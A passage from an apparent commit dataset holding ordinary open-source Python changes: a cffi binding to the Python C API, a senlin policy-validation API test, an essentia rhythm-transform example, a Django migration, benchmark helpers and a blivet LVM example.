PyObject* PyImport_ImportModule(const char *name);
PyObject* PyErr_Occurred();
void PyErr_Print();
PyObject* PyObject_Str(PyObject *o);
PyObject* PyObject_Repr(PyObject *o);
char* PyString_AsString(PyObject *string);
""")
lib = ffi.verify("#include<Python.h>", libraries=["python2.7"], flags=ffi.RTLD_GLOBAL)
lib.Py_Initialize()
|
<commit_before><commit_msg>Add the binding to the C API<commit_after>
|
from cffi import FFI
import sys
ffi = FFI()
ffi.cdef("""
typedef ... PyObject;
void Py_Initialize();
void Py_Finalize();
int PyRun_SimpleString(const char *command);
void Py_INCREF(PyObject *o);
void Py_XINCREF(PyObject *o);
void Py_DECREF(PyObject *o);
void Py_XDECREF(PyObject *o);
PyObject* PyImport_ImportModule(const char *name);
PyObject* PyErr_Occurred();
void PyErr_Print();
PyObject* PyObject_Str(PyObject *o);
PyObject* PyObject_Repr(PyObject *o);
char* PyString_AsString(PyObject *string);
""")
lib = ffi.verify("#include<Python.h>", libraries=["python2.7"], flags=ffi.RTLD_GLOBAL)
lib.Py_Initialize()
|
Add the binding to the C APIfrom cffi import FFI
import sys
ffi = FFI()
ffi.cdef("""
typedef ... PyObject;
void Py_Initialize();
void Py_Finalize();
int PyRun_SimpleString(const char *command);
void Py_INCREF(PyObject *o);
void Py_XINCREF(PyObject *o);
void Py_DECREF(PyObject *o);
void Py_XDECREF(PyObject *o);
PyObject* PyImport_ImportModule(const char *name);
PyObject* PyErr_Occurred();
void PyErr_Print();
PyObject* PyObject_Str(PyObject *o);
PyObject* PyObject_Repr(PyObject *o);
char* PyString_AsString(PyObject *string);
""")
lib = ffi.verify("#include<Python.h>", libraries=["python2.7"], flags=ffi.RTLD_GLOBAL)
lib.Py_Initialize()
|
<commit_before><commit_msg>Add the binding to the C API<commit_after>from cffi import FFI
import sys
ffi = FFI()
ffi.cdef("""
typedef ... PyObject;
void Py_Initialize();
void Py_Finalize();
int PyRun_SimpleString(const char *command);
void Py_INCREF(PyObject *o);
void Py_XINCREF(PyObject *o);
void Py_DECREF(PyObject *o);
void Py_XDECREF(PyObject *o);
PyObject* PyImport_ImportModule(const char *name);
PyObject* PyErr_Occurred();
void PyErr_Print();
PyObject* PyObject_Str(PyObject *o);
PyObject* PyObject_Repr(PyObject *o);
char* PyString_AsString(PyObject *string);
""")
lib = ffi.verify("#include<Python.h>", libraries=["python2.7"], flags=ffi.RTLD_GLOBAL)
lib.Py_Initialize()
|
|
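After verify(), every function declared in the cdef is callable on lib, and C strings come back as char* values to be decoded with ffi.string(). A short sketch driving the embedded interpreter through the binding (Python 2, matching the record; assumes the module is importable as pymetabiosis.bindings):

from pymetabiosis.bindings import ffi, lib

lib.PyRun_SimpleString("x = 21 * 2")          # run code in the hosted CPython
mod = lib.PyImport_ImportModule("math")       # PyObject* for the module
rep = lib.PyObject_Repr(mod)                  # repr() as a new PyObject*
print ffi.string(lib.PyString_AsString(rep))  # -> "<module 'math' ...>"
lib.Py_DECREF(rep)                            # balance the new references
lib.Py_DECREF(mod)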
400369a4905876bc523631dfd75518a04dab069c
|
senlin/tests/tempest/api/policies/test_policy_validate.py
|
senlin/tests/tempest/api/policies/test_policy_validate.py
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.lib import decorators
from senlin.tests.tempest.api import base
from senlin.tests.tempest.common import constants
class TestPolicyValidate(base.BaseSenlinAPITest):
def setUp(self):
super(TestPolicyValidate, self).setUp()
self.policy_id = None
@decorators.idempotent_id('a3f5ad0d-4f3d-4b40-b473-1cfc562cfcee')
def test_policy_validate(self):
params = {
'policy': {
'spec': constants.spec_scaling_policy,
}
}
res = self.client.validate_obj('policies', params)
# Verify resp of policy validate API
self.assertEqual(200, res['status'])
self.assertIsNotNone(res['body'])
policy = res['body']
for key in ['created_at', 'data', 'domain', 'id', 'name', 'project',
'spec', 'type', 'updated_at', 'user']:
self.assertIn(key, policy)
self.assertEqual('validated_policy', policy['name'])
self.assertEqual('senlin.policy.scaling-1.0', policy['type'])
self.assertEqual(constants.spec_scaling_policy, policy['spec'])
|
Add API tests for policy validation
|
Add API tests for policy validation
Add API tests for policy validation
Change-Id: Id3c0bc4280f1c76d4fc085ed8c292c99b4db334b
|
Python
|
apache-2.0
|
openstack/senlin,stackforge/senlin,stackforge/senlin,openstack/senlin,openstack/senlin
|
Add API tests for policy validation
Add API tests for policy validation
Change-Id: Id3c0bc4280f1c76d4fc085ed8c292c99b4db334b
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.lib import decorators
from senlin.tests.tempest.api import base
from senlin.tests.tempest.common import constants
class TestPolicyValidate(base.BaseSenlinAPITest):
def setUp(self):
super(TestPolicyValidate, self).setUp()
self.policy_id = None
@decorators.idempotent_id('a3f5ad0d-4f3d-4b40-b473-1cfc562cfcee')
def test_policy_validate(self):
params = {
'policy': {
'spec': constants.spec_scaling_policy,
}
}
res = self.client.validate_obj('policies', params)
# Verify resp of policy validate API
self.assertEqual(200, res['status'])
self.assertIsNotNone(res['body'])
policy = res['body']
for key in ['created_at', 'data', 'domain', 'id', 'name', 'project',
'spec', 'type', 'updated_at', 'user']:
self.assertIn(key, policy)
self.assertEqual('validated_policy', policy['name'])
self.assertEqual('senlin.policy.scaling-1.0', policy['type'])
self.assertEqual(constants.spec_scaling_policy, policy['spec'])
|
<commit_before><commit_msg>Add API tests for policy validation
Add API tests for policy validation
Change-Id: Id3c0bc4280f1c76d4fc085ed8c292c99b4db334b<commit_after>
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.lib import decorators
from senlin.tests.tempest.api import base
from senlin.tests.tempest.common import constants
class TestPolicyValidate(base.BaseSenlinAPITest):
def setUp(self):
super(TestPolicyValidate, self).setUp()
self.policy_id = None
@decorators.idempotent_id('a3f5ad0d-4f3d-4b40-b473-1cfc562cfcee')
def test_policy_validate(self):
params = {
'policy': {
'spec': constants.spec_scaling_policy,
}
}
res = self.client.validate_obj('policies', params)
# Verify resp of policy validate API
self.assertEqual(200, res['status'])
self.assertIsNotNone(res['body'])
policy = res['body']
for key in ['created_at', 'data', 'domain', 'id', 'name', 'project',
'spec', 'type', 'updated_at', 'user']:
self.assertIn(key, policy)
self.assertEqual('validated_policy', policy['name'])
self.assertEqual('senlin.policy.scaling-1.0', policy['type'])
self.assertEqual(constants.spec_scaling_policy, policy['spec'])
|
Add API tests for policy validation
Add API tests for policy validation
Change-Id: Id3c0bc4280f1c76d4fc085ed8c292c99b4db334b# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.lib import decorators
from senlin.tests.tempest.api import base
from senlin.tests.tempest.common import constants
class TestPolicyValidate(base.BaseSenlinAPITest):
def setUp(self):
super(TestPolicyValidate, self).setUp()
self.policy_id = None
@decorators.idempotent_id('a3f5ad0d-4f3d-4b40-b473-1cfc562cfcee')
def test_policy_validate(self):
params = {
'policy': {
'spec': constants.spec_scaling_policy,
}
}
res = self.client.validate_obj('policies', params)
# Verify resp of policy validate API
self.assertEqual(200, res['status'])
self.assertIsNotNone(res['body'])
policy = res['body']
for key in ['created_at', 'data', 'domain', 'id', 'name', 'project',
'spec', 'type', 'updated_at', 'user']:
self.assertIn(key, policy)
self.assertEqual('validated_policy', policy['name'])
self.assertEqual('senlin.policy.scaling-1.0', policy['type'])
self.assertEqual(constants.spec_scaling_policy, policy['spec'])
|
<commit_before><commit_msg>Add API tests for policy validation
Add API tests for policy validation
Change-Id: Id3c0bc4280f1c76d4fc085ed8c292c99b4db334b<commit_after># Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.lib import decorators
from senlin.tests.tempest.api import base
from senlin.tests.tempest.common import constants
class TestPolicyValidate(base.BaseSenlinAPITest):
def setUp(self):
super(TestPolicyValidate, self).setUp()
self.policy_id = None
@decorators.idempotent_id('a3f5ad0d-4f3d-4b40-b473-1cfc562cfcee')
def test_policy_validate(self):
params = {
'policy': {
'spec': constants.spec_scaling_policy,
}
}
res = self.client.validate_obj('policies', params)
# Verify resp of policy validate API
self.assertEqual(200, res['status'])
self.assertIsNotNone(res['body'])
policy = res['body']
for key in ['created_at', 'data', 'domain', 'id', 'name', 'project',
'spec', 'type', 'updated_at', 'user']:
self.assertIn(key, policy)
self.assertEqual('validated_policy', policy['name'])
self.assertEqual('senlin.policy.scaling-1.0', policy['type'])
self.assertEqual(constants.spec_scaling_policy, policy['spec'])
|
|
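The response checks above (status code, key presence, spec echo) recur across validate tests, so they factor naturally into a helper; a sketch with an illustrative name, not part of the senlin test suite:

EXPECTED_KEYS = ['created_at', 'data', 'domain', 'id', 'name', 'project',
                 'spec', 'type', 'updated_at', 'user']

def assert_policy_body(testcase, res, spec):
    # Shared response verification for policy validate tests.
    testcase.assertEqual(200, res['status'])
    policy = res['body']
    for key in EXPECTED_KEYS:
        testcase.assertIn(key, policy)
    testcase.assertEqual(spec, policy['spec'])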
e76553404834de2f1123bd545922caab28e16375
|
src/examples/tutorial/example_rhythmtransform.py
|
src/examples/tutorial/example_rhythmtransform.py
|
import sys
from essentia.standard import *
from essentia import Pool
try:
input_file = sys.argv[1]
except:
print "usage:", sys.argv[0], "<input_file>"
sys.exit()
sampleRate = 22050
frameSize = 8192
hopSize = 1024
rmsFrameSize = 256
rmsHopSize = 32
loader = MonoLoader(filename=input_file, sampleRate=sampleRate)
w = Windowing(type='blackmanharris62')
spectrum = Spectrum()
melbands = MelBands(sampleRate=sampleRate, numberBands=40, lowFrequencyBound=0, highFrequencyBound=sampleRate/2)
pool = Pool()
for frame in FrameGenerator(audio=loader(), frameSize=frameSize, hopSize=hopSize, startFromZero=True):
bands = melbands(spectrum(w(frame)))
pool.add('melbands', bands)
print len(pool['melbands']), "Mel band frames"
print len(pool['melbands']) / 32, "Rhythm transform frames"
rhythmtransform = RhythmTransform(frameSize=rmsFrameSize, hopSize=rmsHopSize)
rt = rhythmtransform(pool['melbands'])
import matplotlib.pyplot as plt
plt.imshow(rt.T[:,:], aspect = 'auto')
plt.xlabel('Frames')
plt.ylabel('Rhythm Transform coefficients')
plt.show()
|
Add python example for RhythmTransform
|
Add python example for RhythmTransform
|
Python
|
agpl-3.0
|
MTG/essentia,carthach/essentia,arseneyr/essentia,MTG/essentia,carthach/essentia,arseneyr/essentia,MTG/essentia,MTG/essentia,carthach/essentia,arseneyr/essentia,MTG/essentia,carthach/essentia,arseneyr/essentia,carthach/essentia,arseneyr/essentia
|
Add python example for RhythmTransform
|
import sys
from essentia.standard import *
from essentia import Pool
try:
input_file = sys.argv[1]
except:
print "usage:", sys.argv[0], "<input_file>"
sys.exit()
sampleRate = 22050
frameSize = 8192
hopSize = 1024
rmsFrameSize = 256
rmsHopSize = 32
loader = MonoLoader(filename=input_file, sampleRate=sampleRate)
w = Windowing(type='blackmanharris62')
spectrum = Spectrum()
melbands = MelBands(sampleRate=sampleRate, numberBands=40, lowFrequencyBound=0, highFrequencyBound=sampleRate/2)
pool = Pool()
for frame in FrameGenerator(audio=loader(), frameSize=frameSize, hopSize=hopSize, startFromZero=True):
bands = melbands(spectrum(w(frame)))
pool.add('melbands', bands)
print len(pool['melbands']), "Mel band frames"
print len(pool['melbands']) / 32, "Rhythm transform frames"
rhythmtransform = RhythmTransform(frameSize=rmsFrameSize, hopSize=rmsHopSize)
rt = rhythmtransform(pool['melbands'])
import matplotlib.pyplot as plt
plt.imshow(rt.T[:,:], aspect = 'auto')
plt.xlabel('Frames')
plt.ylabel('Rhythm Transform coefficients')
plt.show()
|
<commit_before><commit_msg>Add python example for RhythmTransform<commit_after>
|
import sys
from essentia.standard import *
from essentia import Pool
try:
input_file = sys.argv[1]
except:
print "usage:", sys.argv[0], "<input_file>"
sys.exit()
sampleRate = 22050
frameSize = 8192
hopSize = 1024
rmsFrameSize = 256
rmsHopSize = 32
loader = MonoLoader(filename=input_file, sampleRate=sampleRate)
w = Windowing(type='blackmanharris62')
spectrum = Spectrum()
melbands = MelBands(sampleRate=sampleRate, numberBands=40, lowFrequencyBound=0, highFrequencyBound=sampleRate/2)
pool = Pool()
for frame in FrameGenerator(audio=loader(), frameSize=frameSize, hopSize=hopSize, startFromZero=True):
bands = melbands(spectrum(w(frame)))
pool.add('melbands', bands)
print len(pool['melbands']), "Mel band frames"
print len(pool['melbands']) / 32, "Rhythm transform frames"
rhythmtransform = RhythmTransform(frameSize=rmsFrameSize, hopSize=rmsHopSize)
rt = rhythmtransform(pool['melbands'])
import matplotlib.pyplot as plt
plt.imshow(rt.T[:,:], aspect = 'auto')
plt.xlabel('Frames')
plt.ylabel('Rhythm Transform coefficients')
plt.show()
|
Add python example for RhythmTransformimport sys
from essentia.standard import *
from essentia import Pool
try:
input_file = sys.argv[1]
except:
print "usage:", sys.argv[0], "<input_file>"
sys.exit()
sampleRate = 22050
frameSize = 8192
hopSize = 1024
rmsFrameSize = 256
rmsHopSize = 32
loader = MonoLoader(filename=input_file, sampleRate=sampleRate)
w = Windowing(type='blackmanharris62')
spectrum = Spectrum()
melbands = MelBands(sampleRate=sampleRate, numberBands=40, lowFrequencyBound=0, highFrequencyBound=sampleRate/2)
pool = Pool()
for frame in FrameGenerator(audio=loader(), frameSize=frameSize, hopSize=hopSize, startFromZero=True):
bands = melbands(spectrum(w(frame)))
pool.add('melbands', bands)
print len(pool['melbands']), "Mel band frames"
print len(pool['melbands']) / 32, "Rhythm transform frames"
rhythmtransform = RhythmTransform(frameSize=rmsFrameSize, hopSize=rmsHopSize)
rt = rhythmtransform(pool['melbands'])
import matplotlib.pyplot as plt
plt.imshow(rt.T[:,:], aspect = 'auto')
plt.xlabel('Frames')
plt.ylabel('Rhythm Transform coefficients')
plt.show()
|
<commit_before><commit_msg>Add python example for RhythmTransform<commit_after>import sys
from essentia.standard import *
from essentia import Pool
try:
input_file = sys.argv[1]
except:
print "usage:", sys.argv[0], "<input_file>"
sys.exit()
sampleRate = 22050
frameSize = 8192
hopSize = 1024
rmsFrameSize = 256
rmsHopSize = 32
loader = MonoLoader(filename=input_file, sampleRate=sampleRate)
w = Windowing(type='blackmanharris62')
spectrum = Spectrum()
melbands = MelBands(sampleRate=sampleRate, numberBands=40, lowFrequencyBound=0, highFrequencyBound=sampleRate/2)
pool = Pool()
for frame in FrameGenerator(audio=loader(), frameSize=frameSize, hopSize=hopSize, startFromZero=True):
bands = melbands(spectrum(w(frame)))
pool.add('melbands', bands)
print len(pool['melbands']), "Mel band frames"
print len(pool['melbands']) / 32, "Rhythm transform frames"
rhythmtransform = RhythmTransform(frameSize=rmsFrameSize, hopSize=rmsHopSize)
rt = rhythmtransform(pool['melbands'])
import matplotlib.pyplot as plt
plt.imshow(rt.T[:,:], aspect = 'auto')
plt.xlabel('Frames')
plt.ylabel('Rhythm Transform coefficients')
plt.show()
|
|
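The two print statements are frame bookkeeping: FrameGenerator emits about one mel frame per hopSize samples, and RhythmTransform then consumes mel frames in hops of rmsHopSize (32). A quick arithmetic sketch with a hypothetical one-minute input:

sampleRate, hopSize = 22050, 1024
n_samples = int(60.0 * sampleRate)     # 1,323,000 samples for 60 s
mel_frames = n_samples // hopSize      # ~1291 mel-band frames
rt_frames = mel_frames // 32           # ~40 rhythm-transform frames
print(mel_frames, rt_frames)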
aac06331f2879cc8d39d5512c84da91f2832ff20
|
apps/authentication/migrations/0007_onlineuser_bio.py
|
apps/authentication/migrations/0007_onlineuser_bio.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('authentication', '0006_jobmail_set_true'),
]
operations = [
migrations.AddField(
model_name='onlineuser',
name='bio',
field=models.TextField(null=True, verbose_name='bio', blank=True),
preserve_default=True,
),
]
|
Add migration for bio user field
|
Add migration for bio user field
|
Python
|
mit
|
dotKom/onlineweb4,dotKom/onlineweb4,dotKom/onlineweb4,dotKom/onlineweb4
|
Add migration for bio user field
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('authentication', '0006_jobmail_set_true'),
]
operations = [
migrations.AddField(
model_name='onlineuser',
name='bio',
field=models.TextField(null=True, verbose_name='bio', blank=True),
preserve_default=True,
),
]
|
<commit_before><commit_msg>Add migration for bio user field<commit_after>
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('authentication', '0006_jobmail_set_true'),
]
operations = [
migrations.AddField(
model_name='onlineuser',
name='bio',
field=models.TextField(null=True, verbose_name='bio', blank=True),
preserve_default=True,
),
]
|
Add migration for bio user field# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('authentication', '0006_jobmail_set_true'),
]
operations = [
migrations.AddField(
model_name='onlineuser',
name='bio',
field=models.TextField(null=True, verbose_name='bio', blank=True),
preserve_default=True,
),
]
|
<commit_before><commit_msg>Add migration for bio user field<commit_after># -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('authentication', '0006_jobmail_set_true'),
]
operations = [
migrations.AddField(
model_name='onlineuser',
name='bio',
field=models.TextField(null=True, verbose_name='bio', blank=True),
preserve_default=True,
),
]
|
|
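An AddField operation mirrors the attribute added to the model, so the model-side edit behind this migration is a one-liner. A sketch (class name taken from the record, all other fields omitted, translation import assumed for the lowercase verbose name):

from django.db import models
from django.utils.translation import ugettext_lazy as _

class OnlineUser(models.Model):        # existing model, heavily abbreviated
    bio = models.TextField(_('bio'), null=True, blank=True)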
1d95063d1416f82115fa26d72d548ada0616e239
|
gensabenchmarks/go_func_utils.py
|
gensabenchmarks/go_func_utils.py
|
import sys
import contextlib
import inspect
import gensabenchmarks.go_benchmark_functions as gbf
def goclass():
"""
Generator to get global optimization test classes/functions
defined in SciPy
"""
bench_members = inspect.getmembers(gbf, inspect.isclass)
benchmark_functions = [item for item in bench_members if
issubclass(item[1], gbf.Benchmark)]
for name, klass in benchmark_functions:
yield (name, klass)
class DummyFile(object):
def write(self, x): pass
def flush(self): pass
@contextlib.contextmanager
def nostdout():
save_stdout = sys.stdout
save_stderr = sys.stderr
sys.stdout = DummyFile()
sys.stderr = DummyFile()
yield
sys.stdout = save_stdout
sys.stderr = save_stderr
|
Fix import with full path
|
Fix import with full path
|
Python
|
bsd-2-clause
|
sgubianpm/gensabench,sgubianpm/gensabench,sgubianpm/pygensa,sgubianpm/HyGSA,sgubianpm/pygensa,sgubianpm/HyGSA
|
Fix import with full path
|
import sys
import contextlib
import inspect
import gensabenchmarks.go_benchmark_functions as gbf
def goclass():
"""
Generator to get global optimization test classes/functions
defined in SciPy
"""
bench_members = inspect.getmembers(gbf, inspect.isclass)
benchmark_functions = [item for item in bench_members if
issubclass(item[1], gbf.Benchmark)]
for name, klass in benchmark_functions:
yield (name, klass)
class DummyFile(object):
def write(self, x): pass
def flush(self): pass
@contextlib.contextmanager
def nostdout():
save_stdout = sys.stdout
save_stderr = sys.stderr
sys.stdout = DummyFile()
sys.stderr = DummyFile()
yield
sys.stdout = save_stdout
sys.stderr = save_stderr
|
<commit_before><commit_msg>Fix import with full path<commit_after>
|
import sys
import contextlib
import inspect
import gensabenchmarks.go_benchmark_functions as gbf
def goclass():
"""
Generator to get global optimization test classes/functions
defined in SciPy
"""
bench_members = inspect.getmembers(gbf, inspect.isclass)
benchmark_functions = [item for item in bench_members if
issubclass(item[1], gbf.Benchmark)]
for name, klass in benchmark_functions:
yield (name, klass)
class DummyFile(object):
def write(self, x): pass
def flush(self): pass
@contextlib.contextmanager
def nostdout():
save_stdout = sys.stdout
save_stderr = sys.stderr
sys.stdout = DummyFile()
sys.stderr = DummyFile()
yield
sys.stdout = save_stdout
sys.stderr = save_stderr
|
Fix import with full pathimport sys
import contextlib
import inspect
import gensabenchmarks.go_benchmark_functions as gbf
def goclass():
"""
Generator to get global optimization test classes/functions
defined in SciPy
"""
bench_members = inspect.getmembers(gbf, inspect.isclass)
benchmark_functions = [item for item in bench_members if
issubclass(item[1], gbf.Benchmark)]
for name, klass in benchmark_functions:
yield (name, klass)
class DummyFile(object):
def write(self, x): pass
def flush(self): pass
@contextlib.contextmanager
def nostdout():
save_stdout = sys.stdout
save_stderr = sys.stderr
sys.stdout = DummyFile()
sys.stderr = DummyFile()
yield
sys.stdout = save_stdout
sys.stderr = save_stderr
|
<commit_before><commit_msg>Fix import with full path<commit_after>import sys
import contextlib
import inspect
import gensabenchmarks.go_benchmark_functions as gbf
def goclass():
"""
Generator to get global optimization test classes/functions
defined in SciPy
"""
bench_members = inspect.getmembers(gbf, inspect.isclass)
benchmark_functions = [item for item in bench_members if
issubclass(item[1], gbf.Benchmark)]
for name, klass in benchmark_functions:
yield (name, klass)
class DummyFile(object):
def write(self, x): pass
def flush(self): pass
@contextlib.contextmanager
def nostdout():
save_stdout = sys.stdout
save_stderr = sys.stderr
sys.stdout = DummyFile()
sys.stderr = DummyFile()
yield
sys.stdout = save_stdout
sys.stderr = save_stderr
|
|
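nostdout() simply swaps sys.stdout and sys.stderr for a write-swallowing dummy for the duration of the block, which pairs well with goclass() when instantiating many chatty benchmark classes. Usage sketch (assumes the SciPy benchmark classes accept their default constructor arguments):

from gensabenchmarks.go_func_utils import goclass, nostdout

with nostdout():
    # instantiate every global-optimization benchmark silently
    problems = [(name, klass()) for name, klass in goclass()]
print('collected %d benchmark problems' % len(problems))

Note the stream swap is not exception-safe as written; a try/finally around the yield would restore stdout/stderr even if the block raises.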
ebfa9187f086cf905371f0e364aed534f535aff7
|
examples/lvm_non_linear.py
|
examples/lvm_non_linear.py
|
import os
from examples.common import print_devices
import blivet
from blivet.size import Size
from blivet.util import set_up_logging, create_sparse_tempfile
set_up_logging()
b = blivet.Blivet() # create an instance of Blivet (don't add system devices)
# create a disk image file on which to create new devices
disk1_file = create_sparse_tempfile("disk1", Size("100GiB"))
b.config.disk_images["disk1"] = disk1_file
disk2_file = create_sparse_tempfile("disk2", Size("100GiB"))
b.config.disk_images["disk2"] = disk2_file
b.reset()
try:
disk1 = b.devicetree.get_device_by_name("disk1")
disk2 = b.devicetree.get_device_by_name("disk2")
b.initialize_disk(disk1)
b.initialize_disk(disk2)
pv = b.new_partition(size=Size("50GiB"), fmt_type="lvmpv", parents=[disk1])
b.create_device(pv)
pv2 = b.new_partition(size=Size("50GiB"), fmt_type="lvmpv", parents=[disk2])
b.create_device(pv2)
# allocate the partitions (decide where and on which disks they'll reside)
blivet.partitioning.do_partitioning(b)
vg = b.new_vg(parents=[pv, pv2])
b.create_device(vg)
# new lv with base size 5GiB and unbounded growth and an ext4 filesystem
dev = b.new_lv(fmt_type="ext4", size=Size("5GiB"), grow=True,
parents=[vg], name="unbounded")
b.create_device(dev)
# new lv with base size 5GiB and growth up to 15GiB and an ext4 filesystem
dev = b.new_lv(fmt_type="ext4", size=Size("5GiB"), grow=True,
maxsize=Size("15GiB"), parents=[vg], name="bounded")
b.create_device(dev)
# new lv with a fixed size of 2GiB formatted as swap space
dev = b.new_lv(fmt_type="swap", size=Size("2GiB"), parents=[vg], seg_type="raid1", pvs=[pv, pv2])
b.create_device(dev)
# allocate the growable lvs
blivet.partitioning.grow_lvm(b)
print_devices(b)
# write the new partitions to disk and format them as specified
b.do_it()
print_devices(b)
input("Check the state and hit ENTER to trigger cleanup")
finally:
b.devicetree.teardown_disk_images()
os.unlink(disk1_file)
os.unlink(disk2_file)
|
Add an example of non-linear LV creation
|
Add an example of non-linear LV creation
Useful for some manual testing as well as for people wondering how to do
something like that.
|
Python
|
lgpl-2.1
|
vojtechtrefny/blivet,rhinstaller/blivet,jkonecny12/blivet,vpodzime/blivet,vpodzime/blivet,jkonecny12/blivet,rhinstaller/blivet,vojtechtrefny/blivet,rvykydal/blivet,AdamWill/blivet,AdamWill/blivet,rvykydal/blivet
|
Add an example of non-linear LV creation
Useful for some manual testing as well as for people wondering how to do
something like that.
|
import os
from examples.common import print_devices
import blivet
from blivet.size import Size
from blivet.util import set_up_logging, create_sparse_tempfile
set_up_logging()
b = blivet.Blivet() # create an instance of Blivet (don't add system devices)
# create a disk image file on which to create new devices
disk1_file = create_sparse_tempfile("disk1", Size("100GiB"))
b.config.disk_images["disk1"] = disk1_file
disk2_file = create_sparse_tempfile("disk2", Size("100GiB"))
b.config.disk_images["disk2"] = disk2_file
b.reset()
try:
disk1 = b.devicetree.get_device_by_name("disk1")
disk2 = b.devicetree.get_device_by_name("disk2")
b.initialize_disk(disk1)
b.initialize_disk(disk2)
pv = b.new_partition(size=Size("50GiB"), fmt_type="lvmpv", parents=[disk1])
b.create_device(pv)
pv2 = b.new_partition(size=Size("50GiB"), fmt_type="lvmpv", parents=[disk2])
b.create_device(pv2)
# allocate the partitions (decide where and on which disks they'll reside)
blivet.partitioning.do_partitioning(b)
vg = b.new_vg(parents=[pv, pv2])
b.create_device(vg)
# new lv with base size 5GiB and unbounded growth and an ext4 filesystem
dev = b.new_lv(fmt_type="ext4", size=Size("5GiB"), grow=True,
parents=[vg], name="unbounded")
b.create_device(dev)
# new lv with base size 5GiB and growth up to 15GiB and an ext4 filesystem
dev = b.new_lv(fmt_type="ext4", size=Size("5GiB"), grow=True,
maxsize=Size("15GiB"), parents=[vg], name="bounded")
b.create_device(dev)
# new lv with a fixed size of 2GiB formatted as swap space
dev = b.new_lv(fmt_type="swap", size=Size("2GiB"), parents=[vg], seg_type="raid1", pvs=[pv, pv2])
b.create_device(dev)
# allocate the growable lvs
blivet.partitioning.grow_lvm(b)
print_devices(b)
# write the new partitions to disk and format them as specified
b.do_it()
print_devices(b)
input("Check the state and hit ENTER to trigger cleanup")
finally:
b.devicetree.teardown_disk_images()
os.unlink(disk1_file)
os.unlink(disk2_file)
|
<commit_before><commit_msg>Add an example of non-linear LV creation
Useful for some manual testing as well as for people wondering how to do
something like that.<commit_after>
|
import os
from examples.common import print_devices
import blivet
from blivet.size import Size
from blivet.util import set_up_logging, create_sparse_tempfile
set_up_logging()
b = blivet.Blivet() # create an instance of Blivet (don't add system devices)
# create a disk image file on which to create new devices
disk1_file = create_sparse_tempfile("disk1", Size("100GiB"))
b.config.disk_images["disk1"] = disk1_file
disk2_file = create_sparse_tempfile("disk2", Size("100GiB"))
b.config.disk_images["disk2"] = disk2_file
b.reset()
try:
disk1 = b.devicetree.get_device_by_name("disk1")
disk2 = b.devicetree.get_device_by_name("disk2")
b.initialize_disk(disk1)
b.initialize_disk(disk2)
pv = b.new_partition(size=Size("50GiB"), fmt_type="lvmpv", parents=[disk1])
b.create_device(pv)
pv2 = b.new_partition(size=Size("50GiB"), fmt_type="lvmpv", parents=[disk2])
b.create_device(pv2)
# allocate the partitions (decide where and on which disks they'll reside)
blivet.partitioning.do_partitioning(b)
vg = b.new_vg(parents=[pv, pv2])
b.create_device(vg)
# new lv with base size 5GiB and unbounded growth and an ext4 filesystem
dev = b.new_lv(fmt_type="ext4", size=Size("5GiB"), grow=True,
parents=[vg], name="unbounded")
b.create_device(dev)
# new lv with base size 5GiB and growth up to 15GiB and an ext4 filesystem
dev = b.new_lv(fmt_type="ext4", size=Size("5GiB"), grow=True,
maxsize=Size("15GiB"), parents=[vg], name="bounded")
b.create_device(dev)
# new lv with a fixed size of 2GiB formatted as swap space
dev = b.new_lv(fmt_type="swap", size=Size("2GiB"), parents=[vg], seg_type="raid1", pvs=[pv, pv2])
b.create_device(dev)
# allocate the growable lvs
blivet.partitioning.grow_lvm(b)
print_devices(b)
# write the new partitions to disk and format them as specified
b.do_it()
print_devices(b)
input("Check the state and hit ENTER to trigger cleanup")
finally:
b.devicetree.teardown_disk_images()
os.unlink(disk1_file)
os.unlink(disk2_file)
|
Add an example of non-linear LV creation
Useful for some manual testing as well as for people wondering how to do
something like that.import os
from examples.common import print_devices
import blivet
from blivet.size import Size
from blivet.util import set_up_logging, create_sparse_tempfile
set_up_logging()
b = blivet.Blivet() # create an instance of Blivet (don't add system devices)
# create a disk image file on which to create new devices
disk1_file = create_sparse_tempfile("disk1", Size("100GiB"))
b.config.disk_images["disk1"] = disk1_file
disk2_file = create_sparse_tempfile("disk2", Size("100GiB"))
